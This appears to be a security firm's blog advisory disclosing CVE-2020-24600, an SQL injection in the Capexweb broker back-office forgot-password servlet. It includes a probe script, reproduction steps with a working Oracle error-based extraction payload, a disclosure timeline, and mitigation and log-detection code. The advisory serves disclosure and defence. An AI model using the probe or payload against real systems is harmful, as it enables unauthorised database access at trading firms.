
How to detect CVE-2020-24600?

Posted on 27th Nov, 2020 | By Bhavithra

A new zero-day vulnerability, CVE-2020-24600, was discovered by Cyber Security Works in Shilpi Soft Capexweb 1.1, a multi-exchange back-office solution for capital and derivative market brokers in India.

This vulnerability was discovered in our research lab on July 01, 2020. Our team has also released a script to detect this vulnerability.

You can use the following script to detect this vulnerability. It fetches the login form, submits dummy credentials to obtain a session cookie, then replays the forgot-password request with a single quote appended to dfuserid and checks the response for the Oracle error ORA-01756 (quoted string not properly terminated), which only appears when the quote reaches the database unescaped:

import sys
import ssl
import urllib.error
import urllib.parse
import urllib.request
from lxml import html

# Ignore SSL certificate errors (self-signed certificates are common on these installs)
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def main():
    if len(sys.argv) < 2:
        print("Usage: python capexweb.py <hostname> [port]")
        return
    host = sys.argv[1]
    # default port 443; an optional second argument overrides it
    port = sys.argv[2] if len(sys.argv) > 2 and sys.argv[2] else "443"
    # default application path
    path = "/capexweb"
    URL = "https://" + host + ":" + port + path
    loginformURI = "/capexweb/capexmain_middle.htm"
    try:
        # Request to fetch login form parameters
        response = urllib.request.urlopen(URL + loginformURI, context=ctx)
        tree = html.fromstring(response.read())
        form = tree.find('.//form')
        if form is None:
            print("No login form found at {0}; is this a Capexweb install?".format(URL + loginformURI))
            return
        action = form.action
        params = {}
        params["dfuserid"] = "admin"
        params["dfpassword"] = "password"
        # Remaining form fields the login servlet expects, copied from the page
        for name in ("dfcode", "dfparentdb", "dfparentip", "dfinstaldrive", "B1"):
            params[name] = tree.find('.//input[@name="{0}"]'.format(name)).value
        # Submission of login request and capturing the session-id
        loginURL = URL + action.replace("..", "")
        data = urllib.parse.urlencode(params).encode("utf-8")
        req = urllib.request.Request(loginURL, data)
        response = urllib.request.urlopen(req, context=ctx)
        set_cookie = response.info()["Set-Cookie"]
        if not set_cookie:
            print("No session cookie returned by {0}; cannot continue".format(loginURL))
            return
        cookie = set_cookie.split(";")[0]
        # Forgot-password request with a single quote in dfuserid, sent with the captured session-id
        forgotURI = "/servlet/capexweb.cap_sendMail?dfuserid=admin'&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual"
        forgotURL = URL + forgotURI
        req = urllib.request.Request(forgotURL)
        req.add_header("Cookie", cookie)
        response = urllib.request.urlopen(req, context=ctx)
        body = response.read().decode("utf-8", errors="replace")
        # ORA-01756 in the response means the quote was passed to the database unescaped
        if "ORA-01756" in body:
            print("The {0} is vulnerable".format(URL))
        else:
            print("The {0} is not vulnerable".format(URL))
    except urllib.error.URLError as e:
        # e.reason is an attribute, not a method
        print(e.reason)


if __name__ == "__main__":
    main()

Impact

As of today, 1390 trading companies use this software as their back end. If this vulnerability is exploited successfully, unauthorized users can gain access to the database, resulting in a data breach. Threat actors could also use that foothold to move laterally within the broker's network and disrupt trading, with a potentially large impact on the economy.

Detection

CVE-2020-24600 was found by manual testing. The GET request parameters of the servlet /capexweb/servlet/capexweb.cap_sendMail (in particular dfuserid) are vulnerable to SQL injection.

Disclosure

The vulnerability was disclosed to Shilpi Soft on July 01, 2020.

Timeline

Date                Description
July 01, 2020       Discovered in our research lab
July 17, 2020       Followed up with the vendor
July 29, 2020       Followed up with the vendor
October 7, 2020     Informed CERT-In about the vulnerability
November 27, 2020   CERT-In confirmed the vulnerability fix

 

Incident Analysis

CVE-2020-24600 allows an adversary to perform SQL injection and access the contents of the database. As per the Google dork results (/capexweb/capexweb), 1390 trading companies currently use this software.

Vendor         Product     Versions
Shilpi Soft    Capexweb    Capexweb 1.1

 

Vulnerability Analysis

The send-mail function of the forgot-password flow (servlet capexweb.cap_sendMail) is vulnerable to SQL injection. An adversary can read the contents of the database through it.

Proof of Concept

Product: CAPExWeb (a multi-exchange back-office solution for capital and derivative market brokers in India)

Product version: Capexweb 1.1

Vulnerable URL: http://www.shilpisoft.com/sunil/corporate.zip

Severity rating: High

CVSS V3 Score: 8.6

Steps to reproduce:

Step 1: Visit the /capexweb/capexweb URL on the server where the capexweb client is installed.

Step 2: Now, fill the login form with invalid credentials and click Submit.

Figure 1: Login form with invalid credentials.

Figure 2: Response shows the credentials are invalid.

Step 3: From the error response, click on the "Forgot My Userid or Password" link.

Note: capforgotpassword.jsp cannot be opened directly, because the application takes the user id from the previously submitted login request.

Figure 3: Forgot password page pre-filled with the user id submitted on the login page. Click the Send Request button and the server responds that the user id is invalid.

Figure 4: Replaying the forgot-password request with a user id that contains a single quote returns the Oracle error ORA-01756 "quoted string not properly terminated" from the database, which shows the parameter is concatenated into the SQL statement.

Figure 5: The payload XORXX')) or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner) from v$version))-- (sent URL-encoded, with spaces as %20) in the request retrieves data from the database inside the error message.

Figure 6: The available databases in the Oracle database server.

Mitigation

We recommend the following fixes for this vulnerability.

  • Use parameterised queries (bind variables) for the forgot-password lookup so that request parameters are never concatenated into the SQL statement. Input validation for special characters in request parameters is a useful second layer, but on its own it is easy to bypass and should not be the only control.
  • Show a custom, generic error message instead of the raw database error so users cannot see the cause of the failure on the server side; the ORA-01756 text in the response is what makes this injection error-based and easy to exploit.
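The concatenation described in the proof of concept and the two fixes in the list above, as an added example that is not the vendor's code or anything from the advisory. It reconstructs the vulnerable pattern hypothetically; the table, column names and user records are constructed, and SQLite stands in for Oracle so it runs offline, which means the raw error text is SQLite's rather than ORA-01756 and the Oracle-specific ctxsys.drithsx.sn payload cannot be reproduced here. The boolean payload shows the same consequence the advisory describes: the lookup returns rows for every user.

```python
import sqlite3

# Constructed stand-in for the back-office user table. The product runs on
# Oracle; SQLite is used here only so the example runs offline, so the raw
# error text below is SQLite's rather than ORA-01756.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
    CREATE TABLE users (userid TEXT, pan TEXT, email TEXT);
    INSERT INTO users VALUES ('admin',   'ABCDE1234F', 'admin@example.invalid');
    INSERT INTO users VALUES ('broker1', 'FGHIJ5678K', 'broker1@example.invalid');
""")


def build_unsafe_query(userid):
    """Hypothetical reconstruction of the vulnerable pattern: dfuserid is
    concatenated into the SQL text, so a quote in it changes the statement."""
    return "SELECT email FROM users WHERE userid = '" + userid + "'"


def forgot_password_unsafe(userid):
    """Vulnerable lookup: whatever is in dfuserid is parsed as SQL."""
    cur = CONN.execute(build_unsafe_query(userid))
    return [row[0] for row in cur.fetchall()]


def forgot_password_safe(userid):
    """Fixed lookup: the value is bound as a parameter and never parsed as SQL,
    so a quote is just a character in the user id (first fix in the list above)."""
    cur = CONN.execute("SELECT email FROM users WHERE userid = ?", (userid,))
    return [row[0] for row in cur.fetchall()]


def handle_request(userid, lookup, leak_errors):
    """Mimics the servlet's response. With leak_errors=True the raw database
    error goes back to the client, which is what an error-based injector reads;
    with leak_errors=False only a generic message is returned (second fix)."""
    try:
        emails = lookup(userid)
    except sqlite3.Error as exc:
        if leak_errors:
            return "error: " + str(exc)
        return "error: request could not be processed"
    return "mail sent" if emails else "invalid user id"


if __name__ == "__main__":
    # Step from the PoC: a single quote in the user id breaks the query and the
    # database error is echoed back to the client.
    print(handle_request("admin'", forgot_password_unsafe, leak_errors=True))
    # A boolean payload turns the lookup into "match every row": data exposure.
    print(forgot_password_unsafe("x' OR '1'='1"))
    # The same inputs against the parameterised lookup with generic errors.
    print(handle_request("admin'", forgot_password_safe, leak_errors=False))
    print(forgot_password_safe("x' OR '1'='1"))
```

The two fixes are complementary: binding removes the injection, and the generic error removes the oracle that turns any leftover injection into a data dump. Neither input filtering nor error suppression alone would have prevented a blind variant of the same attack.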

Recommendation

We recommend fixing the vulnerability immediately, as its severity rating is high. As a workaround until the fix is applied, trading companies should restrict access to the vulnerable URL (/capexweb/servlet/capexweb.cap_sendMail), for example at the web server or firewall.
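A log-side check to go with the workaround above, as an added example that is not part of the advisory: it scans web-server access-log lines for requests to the cap_sendMail servlet whose parameters carry a quote or the Oracle error-based functions seen in the PoC payload, so attempts are visible even where the URL cannot be blocked outright. The access-log format (Apache/nginx combined), the generic SQL tokens added to the indicator list, and the sample log lines are assumptions and constructed data.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Servlet named in the advisory as the injection point (path suffix).
SENDMAIL_PATH = "/servlet/capexweb.cap_sendMail"

# Indicators, lowercase: the single quote used as the probe, the Oracle
# error-based functions and the view from the PoC payload, plus a few generic
# SQL tokens (assumed additions; tune them to your own false-positive rate).
INDICATORS = (
    "'", "ctxsys.drithsx.sn", "stragg(", "v$version",
    " or ", "--", "union select",
)

# Assumed log format: Apache/nginx "combined" access log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def inspect_request(target):
    """Return [(param, decoded_value, matched_indicators)] for a sendMail
    request whose parameters look like injection, or [] otherwise."""
    parts = urlsplit(target)
    if not parts.path.endswith(SENDMAIL_PATH):
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            # parse_qs decodes once; decode again so a double-encoded quote
            # (%2527) is still seen as a quote.
            decoded = unquote_plus(value).lower()
            matched = [ind for ind in INDICATORS if ind in decoded]
            if matched:
                hits.append((name, decoded, matched))
    return hits


def scan_access_log(lines):
    """Return one alert per log line that carries a suspicious sendMail request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m.group("target"))
        if hits:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "status": int(m.group("status")), "hits": hits})
    return alerts


# Constructed sample lines: a normal request, the single-quote probe, the PoC
# payload, a quote on an unrelated page, and a double-encoded quote.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Nov/2020:10:00:01 +0530] "GET /capexweb/servlet/capexweb.cap_sendMail'
    '?dfuserid=broker1&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual HTTP/1.1" 200 512',
    '203.0.113.7 - - [27/Nov/2020:10:02:13 +0530] "GET /capexweb/servlet/capexweb.cap_sendMail'
    '?dfuserid=admin%27&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual HTTP/1.1" 500 2048',
    '203.0.113.7 - - [27/Nov/2020:10:02:40 +0530] "GET /capexweb/servlet/capexweb.cap_sendMail'
    '?dfuserid=XORXX%27))%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)'
    '%20from%20v$version))--&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual HTTP/1.1" 500 2310',
    '10.0.0.5 - - [27/Nov/2020:10:03:05 +0530] "GET /capexweb/capexweb/capexmain_middle.htm'
    '?dfuserid=admin%27 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [27/Nov/2020:10:04:59 +0530] "GET /capexweb/servlet/capexweb.cap_sendMail'
    '?dfuserid=admin%2527&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual HTTP/1.1" 500 2048',
]


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        for param, value, matched in alert["hits"]:
            print("{ip} {ts} status={status} {param}={value!r} indicators={m}".format(
                param=param, value=value, m=matched, **alert))
```

The check is scoped to the one servlet so a quote in an unrelated page does not fire, and it decodes twice so a double-encoded probe is not missed. A 500 status on the flagged request is worth correlating with application logs, since that is where the ORA-01756 text from the PoC would appear.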
